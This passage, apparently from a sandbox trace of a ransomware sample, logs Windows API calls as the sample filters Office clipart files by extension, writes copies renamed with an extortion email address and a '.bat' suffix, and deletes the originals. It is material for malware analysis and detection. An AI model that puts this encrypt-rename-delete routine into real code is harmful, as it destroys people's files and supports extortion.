Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf")) returned 1 [0181.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.419] lstrlenW (lpString=".doc") returned 4 [0181.419] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.419] lstrlenW (lpString=".docx") returned 5 [0181.419] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0181.419] lstrlenW (lpString=".pdf") returned 4 [0181.419] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.419] lstrlenW (lpString=".xls") returned 4 [0181.419] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.419] lstrlenW (lpString=".xlsx") returned 5 [0181.419] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0181.419] lstrlenW (lpString=".ppt") returned 4 [0181.419] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.419] lstrlenW (lpString=".zip") returned 4 [0181.419] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.419] lstrlenW (lpString=".rar") returned 4 [0181.419] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.419] lstrlenW (lpString=".bz2") returned 4 [0181.419] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.419] lstrlenW (lpString=".7z") returned 3 [0181.419] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.419] lstrlenW (lpString=".dbf") returned 4 [0181.420] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.420] lstrlenW (lpString=".1cd") returned 4 [0181.420] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.420] lstrlenW (lpString=".jpg") returned 4 [0181.420] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.420] lstrlenW (lpString=".doc") returned 4 [0181.420] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.420] lstrlenW (lpString=".docx") returned 5 [0181.421] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0181.421] lstrlenW (lpString=".pdf") returned 4 [0181.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.421] lstrlenW (lpString=".xls") returned 4 [0181.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.421] lstrlenW (lpString=".xlsx") returned 5 [0181.421] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0181.421] lstrlenW (lpString=".ppt") returned 4 [0181.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.421] lstrlenW (lpString=".zip") returned 4 [0181.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.421] lstrlenW (lpString=".rar") returned 4 [0181.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.421] lstrlenW (lpString=".bz2") returned 4 [0181.421] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.421] lstrlenW (lpString=".7z") returned 3 [0181.421] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.421] lstrlenW (lpString=".dbf") returned 4 [0181.421] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.421] lstrlenW (lpString=".1cd") returned 4 [0181.421] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF") returned 68 [0181.421] lstrlenW (lpString=".jpg") returned 4 [0181.421] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.422] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.422] lstrlenW (lpString="J0105338.WMF") returned 12 [0181.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.422] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=11584) returned 1 [0181.422] CloseHandle (hObject=0x370) returned 1 [0181.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf")) returned 0x220 [0181.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.423] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.423] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0181.424] GetLastError () returned 0x0 [0181.424] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x2d40, lpOverlapped=0x0) returned 1 [0181.477] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2d50, lpOverlapped=0x0) returned 1 [0181.478] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.478] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.478] SetEndOfFile (hFile=0x374) returned 1 [0181.479] CloseHandle (hObject=0x374) returned 1 [0181.479] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.479] SetEndOfFile (hFile=0x370) returned 1 [0181.480] CloseHandle (hObject=0x370) returned 1 [0181.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.480] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf")) returned 1 [0181.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.480] lstrlenW (lpString=".doc") returned 4 [0181.480] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.480] lstrlenW (lpString=".docx") returned 5 [0181.480] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.480] lstrlenW (lpString=".pdf") returned 4 [0181.480] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.480] lstrlenW (lpString=".xls") returned 4 [0181.480] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.480] lstrlenW (lpString=".xlsx") returned 5 [0181.481] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.481] lstrlenW (lpString=".ppt") returned 4 [0181.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.481] lstrlenW (lpString=".zip") returned 4 [0181.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.481] lstrlenW (lpString=".rar") returned 4 [0181.481] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString=".bz2") returned 4 [0181.481] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString=".7z") returned 3 [0181.481] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.481] lstrlenW (lpString=".dbf") returned 4 [0181.481] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.481] lstrlenW (lpString=".1cd") returned 4 [0181.481] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.481] lstrlenW (lpString=".jpg") returned 4 [0181.481] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.481] lstrlenW (lpString=".doc") returned 4 [0181.481] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString=".docx") returned 5 [0181.481] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.481] lstrlenW (lpString=".pdf") returned 4 [0181.481] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString=".xls") returned 4 [0181.481] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.481] lstrlenW (lpString=".xlsx") returned 5 [0181.481] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.481] lstrlenW (lpString=".ppt") returned 4 [0181.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.481] lstrlenW (lpString=".zip") returned 4 [0181.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.482] lstrlenW (lpString=".rar") returned 4 [0181.482] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.482] lstrlenW (lpString=".bz2") returned 4 [0181.482] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.482] lstrlenW (lpString=".7z") returned 3 [0181.482] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.482] lstrlenW (lpString=".dbf") returned 4 [0181.482] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.482] lstrlenW (lpString=".1cd") returned 4 [0181.482] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF") returned 68 [0181.482] lstrlenW (lpString=".jpg") returned 4 [0181.482] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.482] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.482] lstrlenW (lpString="J0105368.WMF") returned 12 [0181.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.483] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=12380) returned 1 [0181.483] CloseHandle (hObject=0x370) returned 1 [0181.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf")) returned 0x220 [0181.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.483] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.483] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0181.484] GetLastError () returned 0x0 [0181.484] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x305c, lpOverlapped=0x0) returned 1 [0181.587] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3060, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3060, lpOverlapped=0x0) returned 1 [0181.589] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.589] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.589] SetEndOfFile (hFile=0x374) returned 1 [0181.589] CloseHandle (hObject=0x374) returned 1 [0181.589] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.589] SetEndOfFile (hFile=0x370) returned 1 [0181.590] CloseHandle (hObject=0x370) returned 1 [0181.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf")) returned 1 [0181.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.590] lstrlenW (lpString=".doc") returned 4 [0181.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.590] lstrlenW (lpString=".docx") returned 5 [0181.590] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.590] lstrlenW (lpString=".pdf") returned 4 [0181.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString=".xls") returned 4 [0181.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.591] lstrlenW (lpString=".xlsx") returned 5 [0181.591] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.591] lstrlenW (lpString=".ppt") returned 4 [0181.591] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.591] lstrlenW (lpString=".zip") returned 4 [0181.591] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.591] lstrlenW (lpString=".rar") returned 4 [0181.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString=".bz2") returned 4 [0181.591] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString=".7z") returned 3 [0181.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.591] lstrlenW (lpString=".dbf") returned 4 [0181.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.591] lstrlenW (lpString=".1cd") returned 4 [0181.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.591] lstrlenW (lpString=".jpg") returned 4 [0181.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.591] lstrlenW (lpString=".doc") returned 4 [0181.591] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.591] lstrlenW (lpString=".docx") returned 5 [0181.591] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.591] lstrlenW (lpString=".pdf") returned 4 [0181.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.592] lstrlenW (lpString=".xls") returned 4 [0181.592] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.592] lstrlenW (lpString=".xlsx") returned 5 [0181.592] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.592] lstrlenW (lpString=".ppt") returned 4 [0181.592] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.592] lstrlenW (lpString=".zip") returned 4 [0181.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.592] lstrlenW (lpString=".rar") returned 4 [0181.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.592] lstrlenW (lpString=".bz2") returned 4 [0181.593] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.593] lstrlenW (lpString=".7z") returned 3 [0181.593] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.593] lstrlenW (lpString=".dbf") returned 4 [0181.593] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.593] lstrlenW (lpString=".1cd") returned 4 [0181.593] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF") returned 68 [0181.593] lstrlenW (lpString=".jpg") returned 4 [0181.593] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.593] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.594] lstrlenW (lpString="J0105380.WMF") returned 12 [0181.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.594] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=4624) returned 1 [0181.594] CloseHandle (hObject=0x370) returned 1 [0181.594] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf")) returned 0x220 [0181.594] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.595] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.595] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0181.596] GetLastError () returned 0x0 [0181.596] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1210, lpOverlapped=0x0) returned 1 [0181.673] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1220, lpOverlapped=0x0) returned 1 [0181.676] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.676] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.676] SetEndOfFile (hFile=0x374) returned 1 [0181.676] CloseHandle (hObject=0x374) returned 1 [0181.676] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.677] SetEndOfFile (hFile=0x370) returned 1 [0181.677] CloseHandle (hObject=0x370) returned 1 [0181.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.678] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf")) returned 1 [0181.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 68 [0181.678] lstrlenW (lpString=".doc") returned 4 [0181.678] lstrcmpiW (lpString1=".doc", 